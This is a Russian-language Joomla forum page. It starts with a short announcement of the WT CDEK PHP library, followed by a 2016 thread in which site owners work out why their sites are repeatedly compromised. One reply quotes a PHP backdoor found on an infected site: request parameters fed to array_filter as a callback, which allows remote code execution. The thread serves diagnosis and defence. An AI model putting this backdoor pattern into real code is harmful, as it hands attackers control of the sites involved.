Новости Joomla

👩‍💻 WT CDEK library v.1.3.0 - обновление PHP SDK для Joomla + CDEK.

👩‍💻 WT CDEK library v.1.3.0 - обновление PHP SDK для Joomla + CDEK.

Небольшая нативная PHP Joomla библиотека для работы с API v.2 службы доставки CDEK. Библиотека представляет собой клиент для авторизации в CDEK API по OAuth, работы с некоторыми методами API: получения ряда данных и расчета стоимости доставки. Поддерживается Joomla 4.2.7 и выше.

В пакет входят:
- библиотека Webtolk/Cdekapi
- системный плагин System - WT Cdek для хранения настроек и AJAX-интеграций
- task-плагин Task - Update WT Cdek data для обновления локальных копий справочников CDEK по расписанию
- web asset с официальным JavaScript-виджетом СДЭК

👉 v.1.3.0. Что нового?
- Полный рефакторинг библиотеки. Библиотека переработана в entity-based API с фасадом Cdek и отдельным слоем запросов. Обратная совместимость не нарушена, поэтому версия библиотеки - 1.3.0.
- Добавлена поддержка новых разделов API СДЭК. Добавлена поддержка новых разделов API СДЭК: webhooks, prealert, печатные формы, payment, passport, reverse, intakes и других сущностей.
- Улучшена интеграция с Joomla.
Улучшена интеграция с Joomla: installer script для layouts, новые поля Joomla Form для тарифов и обновлённые js виджета CDEK.
- документация библиотеки. Все методы библиотеки подробно описаны, а так же текст документации собран в отдельной папке в git репозитории и будет опубликован на сайте.

Библиотека эта нужна для разработчиков, создающих свои расширения для интеграции Joomla и курьерской службы CDEK.

Страница расширения
GitHub расширения

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 4136 Просмотров
*

mak200

  • Захожу иногда
  • 107
  • 0 / 2
Добрый день!
Ищу решение.
Идут регулярные взломы сайта.

Сайт обновляется вовремя.
Пароли сложные, после каждого взлома меняются.
Компьютер с которого работает FTP-клиент проверен на вирусы.
Да и поддержка сказала, что взлом НЕ через FTP или shel.
Все папки имеют права 755, файлы 644.
На сервере сайт не единственный, но взлом происходит через этот, насколько могу судить.

На сайте появляется скрипт cache.php.
Спойлер
[свернуть]

Через него происходит заражение других php файлов.
По времени заражения нашел в логе 4 строчки.
Спойлер
[свернуть]

Кто-то может подсказать в чем уязвимость?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Как понять в чем уязвимость сайта?
« Ответ #1 : 08.06.2016, 18:48:54 »
Я бы не был так уверен, что взлом именно через Joomla .
Что мешает завести отдельный аккаунт для Joomla и тогда уже как бы карантин точно
Из расширений защиты что установлено ? RSFirewall установите
*

mak200

  • Захожу иногда
  • 107
  • 0 / 2
Re: Как понять в чем уязвимость сайта?
« Ответ #2 : 08.06.2016, 19:12:36 »
Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #3 : 08.06.2016, 19:26:02 »
Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?
Сначала почистите сайт, наведите профилактические меры безопасности и поставте снифер для отловли не GET запросов, там все и прояснится, взломщик полюбому будет пытаться востановить доступ, вот там и выявите уязвимый участок кода.
*

mak200

  • Захожу иногда
  • 107
  • 0 / 2
Re: Как понять в чем уязвимость сайта?
« Ответ #4 : 08.06.2016, 19:37:29 »
Сначала почистите сайт,

Это сделал.

наведите профилактические меры безопасности

Что имеется в виду?
Мне кажется, что уже все сделал что знал.

и поставте снифер для отловли не GET запросов

Это что такое, расширение какое-то? Первый раз слышу.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #5 : 08.06.2016, 21:14:16 »
Это что такое, расширение какое-то? Первый раз слышу.
Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
Re: Как понять в чем уязвимость сайта?
« Ответ #7 : 08.06.2016, 21:29:04 »
Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
Круто!
*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
Re: Как понять в чем уязвимость сайта?
« Ответ #8 : 08.06.2016, 21:31:56 »
Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Как понять в чем уязвимость сайта?
« Ответ #9 : 08.06.2016, 21:58:03 »
Версия Joomla какая? Когда была обновлена?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #10 : 08.06.2016, 22:49:24 »
Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
Не всегда баном можно защетиться, а вот найти багу и закрыть ее, вот это дело!
*

mak200

  • Захожу иногда
  • 107
  • 0 / 2
Re: Как понять в чем уязвимость сайта?
« Ответ #11 : 09.06.2016, 00:10:34 »
Joomla!, 3.5.1.
Обновлял до взлома, точно не помню.

Завтра думаю воспроизвести локально свою кмс, со всеми расширениями.
И затем сравнить с сервером на различия файлов.
*

finkel

  • Новичок
  • 2
  • 0 / 0
Re: Как понять в чем уязвимость сайта?
« Ответ #12 : 28.06.2016, 00:19:12 »
Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

Цитировать
IF ($_REQUEST['param1'] && $_REQUEST['param2']) { $f = $_REQUEST['param1']; $p = array( $_REQUEST['param2'); $fp = array_filter($p, $f); echo 'OK'; exit;}

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #13 : 28.06.2016, 11:57:21 »
Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.
Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...
*

finkel

  • Новичок
  • 2
  • 0 / 0
Re: Как понять в чем уязвимость сайта?
« Ответ #14 : 28.06.2016, 16:48:48 »
Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...

Обновили сайтики и выпилили все бекдоры, ждем.
Самое интересное это как через один сайт все заразили.
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Как понять в чем уязвимость сайта?
« Ответ #15 : 28.06.2016, 17:19:58 »
Ну вы их хоть разделили? Чтобы опять такого не было.
*

Ragivort

  • Завсегдатай
  • 1156
  • 58 / 2
  • Такая Life
Re: Как понять в чем уязвимость сайта?
« Ответ #16 : 05.07.2016, 12:41:49 »
 
Ну вы их хоть разделили? Чтобы опять такого не было.
Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Дозволь мне свершить то добро, которое я способен свершить, теперь, ибо я могу более не вернуться сюда.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Как понять в чем уязвимость сайта?
« Ответ #17 : 05.07.2016, 14:46:09 »
Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Создать отдельного пользователя для каждого сайта, один сайт один пользователь с бд, ftp и прочими доступами. Это самое простое разделение. кол-по пользователей = кол-ву сайтов ну и root (root-а использовать только для настроек vps) и работы вести с каждым сайтом только от имени его пользователя.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 4323
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 272966
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 3589
Последний ответ 05.10.2021, 21:39:26
от ShopES
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 3184
Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 5489
Последний ответ 28.08.2020, 22:00:30
от cntrl